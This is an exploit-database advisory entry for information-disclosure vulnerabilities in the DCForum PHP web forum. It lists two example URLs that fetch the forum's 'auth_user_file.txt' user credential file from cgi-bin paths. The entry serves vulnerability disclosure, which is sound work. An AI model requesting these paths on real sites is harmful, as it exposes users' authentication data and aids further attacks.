DCForum - 'auth_user_file.txt' File Multiple Information Disclosure Vulnerabilities

EDB-ID:

38007

CVE:



Author:

r45c4l

Type:

webapps


Platform:

PHP

Date:

2012-11-02


source: https://www.securityfocus.com/bid/56383/info

DCForum is prone to multiple information-disclosure vulnerabilities.

Exploiting these issues may allow an attacker to obtain sensitive information that may aid in further attacks. 

http://www.example.com/cgi-bin/User_info/auth_user_file.txt
http://www.example.com/cgi-bin/dcforum/User_info/auth_user_file.txt